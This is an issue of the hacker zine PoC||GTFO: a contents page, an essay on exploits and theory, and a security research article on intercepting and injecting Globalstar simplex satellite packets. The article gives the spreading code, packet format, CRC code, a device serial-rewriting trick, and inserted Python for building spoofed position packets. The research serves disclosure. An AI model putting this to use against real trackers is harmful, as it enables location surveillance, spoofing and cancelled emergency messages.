PoC||GTFO
PASTOR MANUL LAPHROAIG’S
TABERNACLE CHOIR
SINGS REVERENT ELEGIES
OF THE
SECOND CRYPTO WAR
September 14, 2015
9:2 A Sermon on Newton and Turing
9:3 Globalstar Satellite Communications
9:4 Keenly Spraying the Kernel Pools
9:5 The Second Underhanded Crypto Contest
9:6 Cross VM Communications
9:7 Antivirus Tumors
9:8 A Recipe for TCP/IPA
9:9 Mischief with AX. 25 and APRS
9:10 Napravi i ti Računar „Galaksija“ (Build Your Own Computer „Galaksija“)
9:11 Root Rights are a Grrl’s Best Friend!
9:12 What If You Could Listen to This PDF?
9:13 Oona’s Puzzle Corner!
Novi Sad, Serbia and Stockholm, Sweden:
Funded by Single Malt as Midnight Oil and the
Tract Association of PoC || GTFO and Friends,
to be Freely Distributed to all Good Readers, and
to be Freely Copied by all Good Bookleggers.
This is samizdat. When a book has been written, and well written, have no scruples: take it, copy it.
€0, $0 USD, £0, 0 RSD, 0 SEK, $50 CAD. pocorgtfo09.pdf.
Legal Note: To all interested parties except Adobe Systems, unlimited license is granted to read, duplicate,
share, reprint, and learn from this document. Adobe Systems may not read or learn from this document
unless they agree in writing to (1) forgive the editors for pirating Adobe Photoshop 4.0 for Macintosh and
(2) stop blacklisting our lovely little polyglot files! (An apology to Dmitry Sklyarov would also be nice.)
Reprints: Bitrot will burn libraries with merciless indignity that even Pets Dot Com didn’t deserve. Please
mirror (don’t merely link!) pocorgtfo09.pdf and our other issues far and wide, so our articles can help fight
the coming robot apocalypse.
Technical Note: You’ll be happy to find that pocorgtfo09.pdf is a polyglot that is valid in three file
formats. You may interpret it as a PDF to read this issue, as a ZIP to read this issue’s source code
releases, or as a WavPack lossless audio file to listen to fbz’ classic from page 60. You may have to change
the file extension to .wv, depending on your audio player. A list of compatible players is available at
http://www.wavpack.com/#Software.
Printing Instructions: Pirate print runs of this journal are most welcome! PoC||GTFO is to be printed
duplex, then folded and stapled in the center. Print on A3 paper in Europe and Tabloid (11” x 17”) paper
in Samland. Secret government labs in Canada may use P3 (280 mm x 430 mm) if they like. The outermost
sheet should be on thicker paper to form a cover.
# This is how to convert an issue for duplex printing.
sudo apt-get install pdfjam
pdfbook --short-edge --vanilla --paper a3paper pocorgtfo09.pdf -o pocorgtfo09-book.pdf
Preacherman                                   Manul Laphroaig
Ethics Advisor                                The Grugq
Poet Laureate                                 Ben Nagy
Editor of Last Resort                         Melilot
Carpenter of the Samizdat Hymnary             Redbeard
Editorial Whipping Boy                        Jacob Torrey
Funky File Formats Polyglot                   Ange Albertini
Assistant Scenic Designer                     Philippe Teuwen
Minister of Spargelzeit Weights and Measures  FX
1 Please stand; now, please be seated.
Neighbors, please join me in reading this tenth
release of the International Journal of Proof of Con-
cept or Get the Fuck Out, a friendly little collection
of articles for ladies and gentlemen of distinguished
ability and taste in the field of software exploitation
and the worship of weird machines. This is our tenth
release, given on paper to the fine neighbors of Novi
Sad, Serbia and Stockholm, Sweden.
If you are missing the first nine issues, we the
editors suggest pirating them from the usual loca-
tions, or on paper from a neighbor who picked up a
copy of the first in Vegas, the second in Sao Paulo,
the third in Hamburg, the fourth in Heidelberg, the
fifth in Montreal, the sixth in Las Vegas, the seventh
from his parents’ inkjet printer during the Thanks-
giving holiday, the eighth in Heidelberg, or the ninth
in Montreal.
Page 4 contains our very own Pastor Manul
Laphroaig’s sermon on Newton and Turing, in which
we learn about the academics’ affection for Turing-
completeness and why they should be allowed to
marry it.
On page 7, Colby Moore provides all the details
you’ll need to sniff simplex packets from the Glob-
alstar satellite constellation.
Page 12 introduces some tips by Peter Hlavaty of
the Keen Team on kernel pool spraying in Windows
and Linux.
Page 19 presents the results of the second Under-
handed Crypto Contest, held at the Crypto Village
of Defcon 23.
On page 21, Sophia D’Antoine introduces some
tricks for communicating between virtual machines
co-located on the same physical host. In particular,
the mfence instruction can be used to force strict or-
dering, interfering with CPU instruction pipelining
in another VM.
Eric Davisson, on page 26, presents a nifty lit-
tle trick for causing quarantined malware to be re-
detected by McAfee Enterprise VirusScan! This par-
ticular tumor is benign, but we bet a neighborly
reader can write a malignant variant.
Ron Fabela of Binary Brew Works, on page 28,
presents his recipe for TCP/IPA, a neighborly beer
with which to warm our hearts and our spirits dur-
ing the coming apocalypse.
Our centerfold in this issue is the schematic dia-
gram to an Electronika BK 0010-01 computer from
the USSR. You wouldn’t believe how difficult it is
to google the proper way to render a centerfold in
LaTeX!
Vogelfrei shares with us some tricks for APRS
and AX.25 networking on page 34. APRS exists
around much of the western world, and all sorts of
mischief can be had through it. (But please don’t
be a jerk.)
Much as some readers think of us as a secu-
rity magazine, we are first and foremost a systems-
internals journal with a bias toward the strange and
the classic designs. Page 40 contains a reprint, in
the original Serbian, of Voja Antonić’s article on the
Galaksija, his Z80 home computer design, the very
first in Yugoslavia.
fbz is a damned fine neighbor of ours, both a
mathematician and a musician. On page 60 you’ll
find her latest single, Root Rights are a Grrl’s Best
Friend! If you’d rather listen to it than just read
the lyrics, run vlc pocorgtfo09.pdf and jump to
page 61, where Philippe Teuwen describes how he
made this fine document a polyglot of PDF, ZIP,
and WavPack.
On page 62, you will find Oona’s Puzzle Corner,
with all sorts of nifty games for a child of five. If
you aren’t clever enough to solve them, then ask for
help from a child of five!
On page 64, the last and most important
page, we pass around the collection plate. Pastor
Laphroaig doesn’t need a touring jumbo jet like
those television and radio preachers; rather, this
humble worshiper of the weird machines needs a
Turing jumbo jet with which to storm Heaven!
“Academics should just marry Turing Completeness already!”
—the grugq
2 From Newton to Turing, a Happy Family
by Pastor Manul Laphroaig D.D.
When engineers first gifted humanity with horse-
less carriages that moved on rails under their own
power, this invention, for all its usefulness, turned
out to have a big problem: occasional humans and
animals on the rails. This problem motivated many
inventors to look for solutions that would be both
usable and effective.
Unfortunately, none worked. The reason for
this is not so easy to explain— at least Aristotelian
physics had no explanation, and few scientists till
Galileo’s time were interested in one. On the one
hand, motion had to be brought on by some force and
tended to kinda barrel about once it got going; on
the other hand, it also tended to dissipate eventu-
ally. It took about 500 years from doubting the
Aristotelian idea that motion ceased as soon as its
impelling force ceased to the first clear pronounce-
ment that motion in absence of external forces was
a persistent rather than a temporary virtue; and an-
other 600 for the first correct formulation of exactly
what quantities of motion were conserved. Even so,
it took another century before the mechanical con-
servation laws and the actual names and formulas
for momentum and energy were written down as we
know them.
These days, “conservation of energy” is supposed
to be one of those word combinations to check off
on multiple-choice tests that make one eligible for
college. 1 Yet we should remember that the steam
engine was invented well before these laws of clas-
sical mechanics were made comprehensible or even
understood at all. Moreover, it took some further
40-90 years after Watt’s ten-horsepower steam en-
gine patent to formulate the principles of thermody-
namics that actually make a steam engine work— by
which time it was chugging along at 10,000 horse-
power, able to move not just massive amounts of
machinery but even the engine’s own weight along
the rails, plus a lot more. 2
All of this is to say that if you hear scientists
doubting how an engineer can accomplish things
without their collective guidance, they have a lot
of history to catch up with, starting with that thing
called the Industrial Revolution. On the other hand,
if you see engineers trying to build a thing that just
doesn’t seem to work, you just might be able to point
them to some formulas that suggest their energies
are best applied elsewhere. Distinguishing between
these two situations is known as magic, wisdom, ex-
treme luck, or divine revelation; whoever claims to
be able to do so unerringly is at best a priest, 3 not
a scientist.
1 Whether one actually understands them or not — and, if you value your sanity, do not try to find if your physics teachers
actually understand them either. You have been warned.
2 Not that stationary steam engines were weaklings either: driving ironworks and mining pumps takes a lot of horses.
3 Typically, of a religion that involves central planning and state-run science. This time they’ll get it right, never fear!
There is an old joke that whatever activity needs
to add “science” to its name is not too sure it is one.
Some computer scientists may not take too kindly
to this joke, and point out that it’s actually the
word “computer” that’s misleading, as their science
transcends particular silicon-and-copper designs. It
is undeniable, though, that hacking as we know it
would not exist without actual physical computers.
As scientists, we like exhaustive arguments: ei-
ther by full search of all finite combinatorial pos-
sibilities or by tricks such as induction that look
convincing enough as a means of exhausting infinite
combinations. We value above all being able to say
that a condition never takes place, or always holds.
We dislike the possibility that there can be a situa-
tion or a solution we can overlook but someone may
find through luck or cleverness; we want a yes to
be a yes and a no to mean no way in Hell. But ei-
ther full search or induction only apply in the world
of ideal models— call them combinatorial, logical, or
mathematical— that exclude any kinds of unknown
unknowns.
Hence we have many models of computation:
substituting strings into other strings (Markov algo-
rithms), rewriting formulas (lambda calculus), au-
tomata with finite and infinite numbers of states,
and so on. The point is always to enumerate all fi-
nite possibilities or to convince ourselves that even
an infinite number of them does not harbor the ones
we wish to avoid. The idea is roughly the same as
using algebra: we use formulas we trust to reason
about any and all possible values at once, but to do
so we must reduce reality to a set of formulas. These
formulas come from a process that must prod and
probe reality; we have no way of coming up with
them without prodding, probing, and otherwise ex-
perimenting by hunch and blind groping— that is, by
building things before we fully understand how they
work. Without these, there can be no formulas, or
they won’t be meaningful.
So here we go. Exploits establish the variable
space; “science” searches it, to our satisfaction or
otherwise, or— importantly to save us effort— asserts
that a full and exhaustive search is infeasible. This
may be the case of energy conservation vs. trying
to construct a safer fender— or, perhaps, the case
of us still trying to formulate what makes sense to
attempt.
That which we call the “arms race” is a part of
this process. With it, we continually update the
variable spaces that we wish to exhaust; without it,
none of our methods and formulas mean much. This
brings us to the recent argument about exploits and
Turing completeness.
Knowledge is power . 4 In case of the steam en-
gine, the power emerged before the kind of knowl-
edge called “scientific” (if one is in college) or “basic”
(if one is a politician looking to hitch a ride— because
actual science has a tradition of overturning its own
“basics” as taught in schools for at least decades if
not centuries). In any case, the knowledge of how
to build these engines was there before the knowl-
edge that actually explained how they worked, and
would hardly have emerged if these things had not
been built already.
4 The question of whether that which is not power is still knowledge is best left to philosophers. One can blame Nasir al-Din
al-Tusi for explaining the value of Astrology to Khan Hulagu by dumping a cauldron down the side of a mountain to wake up
the Khan’s troops and then explaining that those who knew the causes above remained calm while those who didn’t whirled in
confusion below — but one can hardly deny that being able to convince a Khan was, in fact, power. Not to mention his horde.
Because a Khan, by definition, has a very convincing comeback for “Yeah? You and what horde?”
Our very own situation, neighbors, is not unlike
that of the steam power before the laws of ther-
modynamics. There are things that work (pump
mines, drive factories), and there are official ways of
explaining them that don’t quite work. Eventually,
they will merge, and the explanations will catch up,
and will then become useful for making things that
work better— but they haven’t quite yet, and it is
frustrating.
exploit programming, they not only focused on
the least practically relevant aspect of it (Tur-
ing completeness) but did so to the exclusion of
all other kinds of niftiness such as information
leaks, probabilistic programming (heap feng-shui
and spraying), parallelism (cloning and pinning of
threads to sap randomization), and so on. That
focus on the irrelevant to the detriment of the rele-
vant really rankled. It was hard to miss where
the next frontier of exploitation’s hard programming
tasks and its next set of challenges lay, but oh boy,
did academia do it again.
Yet it is also clear why they did it. Academic
CS operates by models and exhaustive searches or
reasoning. Its primary method and deliverable is
exhaustive analysis of models, i.e., the promise that
certain bad things never happen, that all possible
trajectories of a system have been or can be enu-
merated.
Academia first saw exploit programming when
it was presented to it in the form of a model; prior
to that, their eyes would just slide off it, because it
looked “ad-hoc”, and one can neither reason about
“ad-hoc” nor enumerate it (at least, if one wants
to meet publication goals). When it turned out it
had a model, academia did with it what it normally
does with models: automating, tweaking, searching,
finding their theoretical limits, and relating them to
other models, one paper at a time . 5
This is not a bad method; at least, it gave us
complex compilers and CPUs that don’t crumble
under the weight of their bugs . 6 Eventually we will
want the kind of assurances this method creates—
when their models of unexpected execution are com-
plete enough and close enough to reality. For now,
they are not, and we have to go on building our en-
gines without guidance from models, but rather to
make sure new models will come from them.
Not that we are without hope. One only has
to look to Grsecurity/PaX at any given time to
see what will eventually become the precise stuff of
Newton’s laws for the better OS kernels; similarly,
the inescapable failure modes of data and program-
ming complexity will eventually be understood as
clearly as the three principles of thermodynamics.
Until then our best bet is to build engines— however
unscientific— and to construct theories— however re-
moved from real power— and to hope that the en-
gineering and the science will take enough notice of
each other to converge within a lifetime, as they have
had the sense to do during the so-called Industrial
Revolution, and a few lucky times since.
And to this, neighbors, the Pastor raises not one
but two drinks— one for the engineering orienting the
science, and one for the science catching up with the
knowledge that is power, and saving it the effort of
what cannot be done— and may they ever converge!
Amen.
5 And some of these papers were true Phrack-like gems that, true to the old-timey tradition, explained and exposed surprising
depths of common mechanisms: see, for example, SROP and COOP.
6 While, for example, products of the modern web development “revolution” already do, despite being much less complex
than a CPU.
3 Breaking Globalstar Satellite Communications
by Colby Moore
It might be an understatement to say that hackers have a fascination with satellites. Fortunately, with
advancements in Software Defined Radio such as the Ettus Research USRP and Michael Ossmann’s HackRF,
satellite hacking is now not only feasible, but affordable. Here we’ll discuss the reverse engineering of
Globalstar’s Simplex Data Service, allowing for interception of communications and injection of data back
into the network.
Rumor has it that after deployment, Globalstar’s first generation of satellites began to fail, possibly due
to poor radiation hardening. This affected the return path data link, where Globalstar would transmit to a
user. To salvage the damaged satellite network, Globalstar introduced a line of simplex products that enable
short, one-way communication from the user to Globalstar.
The nature of the service makes it ideal for asset tracking and remote sensor monitoring. While extremely
popular with oil and gas, military, and shipping industries, this technology is also widely used by consumers.
A company called SPOT produces consumer-grade asset trackers and personal locator beacons that utilize
this same technology.
Globalstar touts their simplex service as “extremely difficult” to intercept, noting that the signal’s “Low-
Probability-of-Intercept (LPI) and Low-Probability-of-Detection (LPD) provide over-the-air security.” 7
In this article I’ll outline the basics for reverse engineering the Globalstar Simplex Data Services mod-
ulation scheme and protocol, and will provide the technical information necessary to interface with the
network.
3.1 Network Architecture
The network is comprised of many Low Earth Orbit, bent-pipe satellites. Data is transmitted from the user
to the satellite on an uplink frequency and repeated back to Earth on a downlink frequency. Globalstar
ground stations all over the world listen for this downlink data, interpret it, and expose it to the user via an
Internet-facing back-end. Each ground station provides a several thousand mile window of data coverage.
Bent-pipe satellites are “dumb” in that they do not modify the transmitted data. This means that the
data on the uplink is the same on the downlink. Thus, with the right knowledge, a skilled adversary can
intercept data on either link.
3.2 Tools and Code
This research was conducted using GNU Radio and Python for data processing and an Ettus Research B200
for RF work. Custom proof-of-concept toolsets were written for DSSS and packet decoding. Devices tested
include a SPOT Generation 3, a SPOT Trace, and a SmartOne A.
3.3 Frequencies and Antennas
Four frequencies are allocated for the simplex data uplink. Current testing has only shown operation on
channel A.

Channel   Frequency
A         1611.25 MHz
B         1613.75 MHz
C         1616.25 MHz
D         1618.78 MHz
7 http://productsupport.globalstar.com/2009/02/09/are-simplex-messages-secure/
Globalstar uses left-hand circular-polarized antennas for transmission of simplex data from the user to
the satellite. The Globalstar GSP-1620 antenna, designed for transmitting from the user to a satellite, has
proven adequate for experimentation.
Downlink is a bit more complicated, and far more faint. Channels vary by satellite, but are within the
6875-7055 MHz range. Both RHCP and LHCP are used for downlink.
3.4 Direct Sequence Spread Spectrum
Devices using the simplex data service implement direct sequence spread spectrum (DSSS) modulation to
reliably transmit data using low power. DSSS is a modulation scheme that works by mixing a slow data signal
with a very fast Pseudo Noise (PN) sequence. Since the pseudo-random sequence is known, the resulting
signal retains all of the original data information but spread over a much wider spectrum. Among other
benefits, this process makes the signal more tolerant to interference.
In Globalstar’s implementation of DSSS, packet data is first modulated as non-differential BPSK at
100.04 bits/second, then spread using a repeating 255 chip PN sequence at a rate of 1,250,000 chips/second.
Here “chip” refers to one bit of a PN sequence, so that it is not confused with actual data bits.
3.5 Pseudo Noise Sequence / M-Sequences
Pseudo Noise (PN) sequences are periodic binary sequences known by both the transmitter and receiver.
Without this sequence, data cannot be received. The simplex data service uses a specific type of PN sequence
called an M-Sequence.
M-Sequences have the unique property of having a strong autocorrelation for phase shifts of zero but
very poor correlation for any other phase shift. This makes the detection of the PN in unknown data, and
subsequently locking on to a DSSS signal, relatively simple.
All simplex data network devices examined use the same PN sequence to transmit data. By knowing one
code, all network data can be intercepted.
3.6 Obtaining The M-Sequence
In order to intercept network data, the PN sequence must be recovered. For each bit of data transmitted,
the PN sequence repeats 49 times. Data packets contain 144 bits.
(1,250,000 chips / 1 second) × (1 second / 100.04 bits) × (1 PN sequence / 255 chips) ≈ 49 PN sequences / bit

The PN sequence never crosses a bit boundary, so within any one data bit the chip stream is
xor(PN, data) with the data bit held constant: that is, either the PN itself (data bit 0) or its
bitwise complement (data bit 1). Either way the raw chips repeat with the period of the PN.
By decoding the transmitted data stream as BPSK, 8 we can demodulate a spread bitstream. Note that
demodulation in this manner negates any processing gain provided from DSSS and thus can only be received
over short distances, so for long distances you will need to use a proper DSSS implementation.
Viewing the demodulated bitstream, a repeating sequence is observed. This is the PN, the spreading
code key to the kingdom.
The simplex data network PN code (255 chips) is
111111110010110101101110101010111001001101101001100110100011101101100010001001111010010010000111100010100111000111110101111001110100001010110010100010110000011001000110000110111111011100001000001001010100101111100000011100110001101010000000101110111101100
3.7 Despreading
DSSS theory states that to decode a DSSS-modulated signal, a received signal must be mixed once again
with the modulating PN sequence; the original data signal will then fall out. However, for this to work, the
PN sequence needs to be phase-aligned with the mixed PN/data signal, otherwise only noise will emerge.
Alignment of the PN sequence to the data stream is accomplished by correlating the PN sequence against
the incoming datastream at each sample. When aligned, the correlation will peak. To despread, this
correlation peak is tracked and the PN is mixed with the sampled RF data. The resulting signal is the
100.04 bit/second non-differential BPSK modulated packet data.
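The chain that sections 3.4 through 3.7 describe, as an added example and not the article's own code: spread data bits at 49 PN periods per bit, recover a repeating 255-chip pattern from a raw chip stream by majority vote, acquire the code phase by correlation against a known reference, and despread back to bits. Assumptions: the m-sequence is generated here from a generic 8-stage LFSR (the article prints the network's PN code but not its generator polynomial), the chip stream and its 3% chip-error channel are constructed rather than captured, and the receiver is started 1000 chips into the first bit to show acquisition from an arbitrary offset.

```python
"""Spread, acquire and despread a Globalstar-style DSSS stream (added example)."""
import random

SEQ_LEN = 255
REPS_PER_BIT = 49   # 1,250,000 chips/s / 100.04 bit/s / 255 chips per period (article's figure)


def lfsr_msequence():
    """One period of a maximal-length sequence from a[k] = a[k-8]^a[k-4]^a[k-3]^a[k-2],
    characteristic polynomial x^8+x^6+x^5+x^4+1 (primitive, so the period is 2^8-1 = 255).
    The polynomial is an assumption for the demo, not the network's generator."""
    a = [1] * 8
    while len(a) < SEQ_LEN:
        a.append(a[-8] ^ a[-4] ^ a[-3] ^ a[-2])
    return a


def autocorrelation(pn, shift):
    """Periodic +/-1 autocorrelation. An m-sequence gives 255 at shift 0 and -1 at every
    other shift, which is why a single correlator finds the code phase cleanly."""
    return sum(1 if pn[i] == pn[(i + shift) % SEQ_LEN] else -1 for i in range(SEQ_LEN))


def spread(bits, pn):
    """chip = data bit XOR PN chip, 49 whole PN periods per bit (a bit never changes mid-period)."""
    chips = []
    for b in bits:
        chips.extend([b ^ c for c in pn] * REPS_PER_BIT)
    return chips


def add_chip_errors(chips, rate, seed=1):
    """Constructed channel noise: flip a fraction of chips at random (deterministic seed)."""
    rng = random.Random(seed)
    return [c ^ 1 if rng.random() < rate else c for c in chips]


def find_repeating_period(chips, max_period=1024, window=2048, tolerance=0.3):
    """The article's observation on a raw BPSK demodulation: a repeating sequence.
    Return the smallest lag at which the stream agrees with itself, tolerating chip errors
    (a wrong lag disagrees about half the time because of the m-sequence's shift-and-add property)."""
    for p in range(2, max_period + 1):
        mismatches = sum(chips[j] != chips[j + p] for j in range(window))
        if mismatches <= tolerance * window:
            return p
    return None


def recover_pn(chips, period, periods=16):
    """Majority-vote one period out of several consecutive ones inside a single data bit.
    The result is a cyclic shift of the PN (or its complement if that bit was a 1); either
    works as a despreading reference, the peak just lands at a different offset."""
    return [1 if sum(chips[i + k * period] for k in range(periods)) * 2 > periods else 0
            for i in range(period)]


def correlate(chips, pn, offset):
    """+/-1 correlation of the reference PN against chips[offset:offset+255]."""
    return sum(1 if chips[offset + i] == pn[i] else -1 for i in range(SEQ_LEN))


def acquire(chips, pn):
    """Sweep one period of chip offsets: the aligned offset correlates near +255 (0 bit)
    or -255 (1 bit); every other offset sits near -1 plus noise."""
    return max(range(SEQ_LEN), key=lambda o: abs(correlate(chips, pn, o)))


def despread(chips, pn, offset):
    """One hard decision per aligned PN period: majority of (chip XOR pn chip) over 255 chips."""
    decisions = []
    for start in range(offset, len(chips) - SEQ_LEN + 1, SEQ_LEN):
        ones = sum(chips[start + i] ^ pn[i] for i in range(SEQ_LEN))
        decisions.append(1 if ones * 2 > SEQ_LEN else 0)
    return decisions


def decisions_to_bits(decisions):
    """49 period decisions per bit; the first decision transition fixes the bit clock
    (bit boundaries are every 49 periods from it). Only bits fully inside the capture
    are returned, so a partial leading bit is dropped."""
    t = next((i for i in range(1, len(decisions)) if decisions[i] != decisions[i - 1]), None)
    if t is None:
        return []
    phase = t % REPS_PER_BIT
    bits = []
    for start in range(phase, len(decisions) - REPS_PER_BIT + 1, REPS_PER_BIT):
        window = decisions[start:start + REPS_PER_BIT]
        bits.append(1 if sum(window) * 2 > REPS_PER_BIT else 0)
    return bits


def demo():
    """Constructed end-to-end run: preamble 0000001011 plus four more bits, 3% chip errors,
    receiver started 1000 chips into the first bit. Returns (period, pn_estimate, offset, bits)."""
    pn = lfsr_msequence()
    tx_bits = [0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1]
    rx = add_chip_errors(spread(tx_bits, pn), 0.03)[1000:]
    period = find_repeating_period(rx)          # 255: the PN length falls out of the raw stream
    pn_est = recover_pn(rx, period)             # a rotation of pn (the first bit is a 0)
    offset = acquire(rx, pn)                    # 20: (1000 + 20) is a multiple of 255
    bits = decisions_to_bits(despread(rx, pn, offset))  # tx_bits minus the partial first bit
    return period, pn_est, offset, bits


if __name__ == "__main__":
    print(demo())
```

The despreading here uses the reference PN directly because, as in the attack, the code only has to be recovered once; the recovered estimate in `pn_est` is a rotation of the reference, which the correlator would simply acquire at a different offset. Note that demodulating the raw chips to find the repeating pattern throws away the processing gain, exactly the short-range caveat the article gives.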
3.8 Decoding and Locations
Once the signal is despread, a BPSK demodulator is used to recover data. The result is a binary stream,
144 bits in length, representing one data packet. The data packet format is as follows:
Field           Bits   Description
Preamble        10     0000001011 signifies start of packet
ESN             26     3 bits for manufacturer ID and 23 bits for unit ID
Message #       4      message number modulo 16, saved in non-volatile memory
Packet #        4      number of packets in a message
Packet Seq. #   4      sequence number for each packet in a message
User Data       72     9 bytes of user information, MSB first
CRC24           24     CRC is 24 bits with polynomial 114377431 (octal, as in the code below)
Simplex data packets can technically transmit any 72 bits of user defined data. However, the network is
predominantly used for asset tracking and thus many packets contain GPS coordinates being relayed from
tracking devices. This data scheme for GPS coordinates can be interpreted with the following Python code.
    # user_data is the 72-bit field as a string of '0'/'1' characters
    latitude = int(user_data[8:32], 2) * 90 / 2**23
    longitude = 360 - int(user_data[32:56], 2) * 180 / 2**23
8 DSSS theory shows us that DSSS is the same as BPSK for a BPSK data signal.
3.9 CRC
Packets are verified using a 24 bit CRC. The data packet minus the preamble and CRC are fed into the CRC
algorithm in order to verify or generate a CRC. The following Python code implements the CRC algorithm.
    import sys

    def crcTwentyfour(TX_Data):
        # TX_Data is the 144-bit packet as a string of '0'/'1' characters
        Crc = 0xFFFFFF
        for k in range(0, 14):  # calc checksum on 14 bytes starting with ESN
            # offset of 8 bits skips most of the preamble (dictated by algorithm)
            TempCRC = int(TX_Data[(k*8)+8 : (k*8)+8+8], 2)
            if 0 == k:
                # skip the remaining 2 preamble bits in byte 0
                TempCRC = TempCRC & 0x3f
            Crc = Crc ^ (TempCRC << 16)
            for m in range(0, 8):
                Crc = Crc << 1
                if Crc & 0x1000000:
                    # reduce by the generator polynomial (octal 114377431)
                    Crc = Crc ^ 0o114377431
            Crc = Crc & 0xffffff
        # end crc generation, lowest 24 bits hold the CRC
        # first CRC byte to TX_Data
        byte14 = (Crc & 0x00ff0000) >> 16
        # second CRC byte to TX_Data
        byte15 = (Crc & 0x0000ff00) >> 8
        # third CRC byte to TX_Data
        byte16 = (Crc & 0x000000ff)
        final_crc = (byte14 << 16) | (byte15 << 8) | byte16
        if final_crc != int(TX_Data[120:144], 2):
            print("Error: CRC failed")
            sys.exit(0)
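Putting sections 3.8 and 3.9 together, here is an added example (not the article's code) that builds a 144-bit packet from its fields, appends a CRC computed the same way as the routine above, parses and verifies a received packet, and converts tracker coordinates with the article's scaling. The manufacturer ID, unit ID and message numbers are made up; the first user-data byte and the last 16 bits are passed through opaque, since the article does not say what they carry.

```python
"""Build, verify and decode Globalstar simplex data packets (added example)."""

PREAMBLE = "0000001011"
CRC24_POLY = 0o114377431   # the article's octal constant (0x131FF19): x^24 plus the 24-bit remainder
FIELDS = (("esn", 26), ("msg_num", 4), ("pkt_count", 4), ("pkt_seq", 4), ("user_data", 72))


def crc24(packet_bits):
    """Same procedure as the article's routine: init 0xFFFFFF, 14 bytes starting at bit 8,
    the two preamble bits left in the first byte masked off, MSB-first shift with reduction.
    Covers bits 10..119 (ESN through user data); the preamble is not protected."""
    crc = 0xFFFFFF
    for k in range(14):
        byte = int(packet_bits[8 + 8 * k:16 + 8 * k], 2)
        if k == 0:
            byte &= 0x3F
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= CRC24_POLY
        crc &= 0xFFFFFF
    return crc


def build_packet(manufacturer_id, unit_id, msg_num, pkt_count, pkt_seq, user_data):
    """Return the 144-bit packet string: preamble, ESN (3+23 bits), counters, 72-bit
    user data, CRC. Values are given as integers, user_data as a 72-character bit string."""
    if len(user_data) != 72 or set(user_data) - {"0", "1"}:
        raise ValueError("user_data must be a 72-bit string")
    esn = (manufacturer_id << 23) | unit_id
    body = PREAMBLE + f"{esn:026b}{msg_num:04b}{pkt_count:04b}{pkt_seq:04b}" + user_data
    return body + f"{crc24(body):024b}"          # crc24 only reads bits 8..119 of body


def parse_packet(packet_bits):
    """Split the fields and check the trailing CRC. 'crc_ok' is False for any single
    corruption of bits 10..143; a flipped preamble bit is caught by the preamble check."""
    if len(packet_bits) != 144 or not packet_bits.startswith(PREAMBLE):
        raise ValueError("not a simplex data packet (length or preamble)")
    pos = len(PREAMBLE)
    fields = {}
    for name, width in FIELDS:
        fields[name] = packet_bits[pos:pos + width]
        pos += width
    esn = int(fields["esn"], 2)
    fields.update(manufacturer_id=esn >> 23, unit_id=esn & 0x7FFFFF,
                  msg_num=int(fields["msg_num"], 2), pkt_count=int(fields["pkt_count"], 2),
                  pkt_seq=int(fields["pkt_seq"], 2))
    fields["crc_ok"] = crc24(packet_bits) == int(packet_bits[120:], 2)
    return fields


def decode_position(user_data):
    """The article's scaling for tracker packets: 24-bit fields at user-data bits 8..31
    (latitude, 2^23 = 90 degrees) and 32..55 (longitude, 360 minus 2^23 = 180 degrees)."""
    lat = int(user_data[8:32], 2) * 90 / 2 ** 23
    lon = 360 - int(user_data[32:56], 2) * 180 / 2 ** 23
    return lat, lon


def encode_position(lat, lon, header_byte=0, trailer=0):
    """Inverse of decode_position, for crafting tracker-style user data. header_byte (8 bits)
    and trailer (16 bits) are passed through unchanged; the article does not define them."""
    lat_raw = round(lat * 2 ** 23 / 90)
    lon_raw = round((360 - lon) * 2 ** 23 / 180)
    return f"{header_byte:08b}{lat_raw:024b}{lon_raw:024b}{trailer:016b}"


if __name__ == "__main__":
    pkt = build_packet(5, 0x12345, 7, 1, 1, encode_position(45.0, 90.0))
    parsed = parse_packet(pkt)
    print(pkt, parsed["crc_ok"], decode_position(parsed["user_data"]))
```

The CRC covers the ESN and payload but carries no key, so a crafted packet with a valid CRC is indistinguishable from a legitimate one; that is the whole reason the injection described in the next section works.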
3.10 Transmitting
DISCLAIMER: It is most likely illegal to transmit on Globalstar’s frequencies where you live. Do so at your
own risk. Remember, no one likes late night visits from the FCC and it would really suck if you interrupted
someone’s emergency communication!
By knowing the secret PN code, modulation parameters, data format, and CRC, it is possible to craft
custom data packets and inject them back into the satellite network. The process is as follows:
• Generate a custom packet
• Calculate and affix the packet’s CRC
• Spread the packet using the Globalstar PN sequence
• BPSK modulate the spread data and transmit on the RF carrier
Various SDR boards should have enough power to communicate with the network; however, COTS am-
plifiers are available for less than a few hundred dollars. Specifications suggest a transmit power of about
200 milliwatts.
3.11 Spoofing
SPOT produces a series of asset trackers called SPOT Trace. SPOT also provides SPOT_Device_Updater.pkg,
an OS X update utility, to configure various device settings. This utility contains development code that is
never called by the consumer application.
The updater app package contains SPOT3FirmwareTool.jar. Decompilation shows that a UI view calls
a method writeESN() in SPOTDevice.class. You read that correctly, they included the functionality to
program arbitrary serial numbers to SPOT devices!
This UI can be called with a simple Java utility.
    import com.globalstar.SPOT3FirmwareTool.UI.DebugConsole;

    public class SpotDebugConsole {
        public static void main(String[] args) {
            DebugConsole.main(args);
        }
    }
Upon execution, a debug console is launched, allowing the writing of arbitrary settings including ESNs, to
the SPOT device. (This functionality was included in Spot Device Updater 1.4 but has since been removed.)
3.12 Impact
The simplex data network is implemented in countless places worldwide. Everything from SCADA monitor-
ing to emergency communications relies on this network. To find that there is no encryption or authentication
on the services examined is sad. And to see that injection back into the network is possible is even worse.
Using the specifications outlined here, it is possible— among other things— to intercept communications
and track assets over time, spoof an asset’s location, or even cancel emergency help messages from personal
locator beacons.
One could also enhance their own service, create their own simplex data network device, or use the
network to transmit their own covert communications.
3.13 PoC and Resources
This work was presented at BlackHat USA 2015 and proof-of-concept code is available both on GitHub and
within this PDF file. 9
9 git clone https://github.com/synack/globalstar
unzip pocorgtfo09.pdf globalstar.tar.bz2